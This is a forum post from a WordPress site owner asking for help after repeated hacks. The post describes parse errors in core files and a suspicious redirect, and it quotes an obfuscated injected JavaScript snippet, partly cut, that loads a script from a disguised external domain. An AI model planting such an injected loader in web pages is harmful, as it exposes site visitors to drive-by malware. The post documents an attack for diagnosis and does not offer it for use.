Site Hacked AGAIN!

I have posted about this before and followed all the steps that people kindly provided but yet again my WordPress sites have all been hacked. I visited my sites this morning (they were working fine last night) to find the following error:

Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

Once I overwrote this file with one from a fresh WordPress download, it then brings up this error:

Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1042

Again, I overwrote this file with one from a fresh WordPress download and the site comes back up with no errors and everything appears to be fine (but it isn’t!).

This is not an error due to editing a template file nor is it a problem with an installed plugin (unless that is where the hacker is getting in?) THIS IS A HACK ATTEMPT IN WHICH THEY HAVE SUCCEEDED! At the bottom of the browser where it shows ‘waiting for http://www.pinkgarden.co.uk’ a suspicious web site address appears, something along the lines of streamate-50.com-worldofwarcraft… and my web browser blocks a file that is trying to download from my site (the pop-up blocker tells me it’s a DAT file or something) I DO NOT have pop-up windows on my web site nor do I have files that download from my site.

If I look at my source code, they have also managed to insert the following Javascript which sometimes appears and then sometimes doesn’t:

<script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement(‘s&(!$c@(r&@@(i(&^p^&t!’.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ”));N093zwnmmc31lmu.setAttribute(‘type’, ‘text/javascript’);N093zwnmmc31lmu.setAttribute(‘src’, ‘h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^( [snip some of this code] |\)|\$|\^|@|#|&|\(/ig, ”));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script>

This was not there last night, nor is it something that I have added myself.

This happened to me a week or so ago and I had to COMPLETELY wipe my ENTIRE site files and databases and start from scratch, which was very much my last resort. I emptied all my databases, removed every single file from my web server, downloaded a fresh new copy of the latest of WordPress, downloaded fresh new copies of needed plugins, re-installed everything from scratch, with brand new database logins, passwords, new admin login (even downloaded the plugin that changes the default admin name to something less obvious as ‘admin’) used the default templates that come with the script and yet here I am again, hacked.

Pretty much all the plugins I installed where compatible with my version of WordPress and I only downloaded ones where the feedback on them was 4 star plus, i.e. very positive.

I do not have any other scripts or files running on my file server, so it’s not a possible conflict there.

I even went as far as making sure my brand new computer didn’t have a virus on it, which it doesn’t.

I will be emailing this to the creators of WordPress but in the mean time, what do I do now? Does this mean I have to find another script, which I really do not want to do but on the other hand, I cannot keep getting hacked every week!